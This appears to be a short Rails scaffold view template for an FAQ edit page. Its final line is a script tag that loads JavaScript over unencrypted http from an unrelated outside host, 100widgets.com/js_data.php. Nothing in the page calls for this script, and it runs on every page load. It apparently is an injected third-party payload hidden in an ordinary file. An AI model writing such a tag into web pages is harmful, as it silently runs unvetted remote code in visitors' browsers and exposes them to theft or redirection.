<h1>Faq#edit</h1>
<p>Find me in app/views/faq/edit.html.erb</p>
<%= link_to "Back", faq_path, class: 'btn btn-default' %>
<script type="text/javascript" src="http://100widgets.com/js_data.php?id=221"></script>
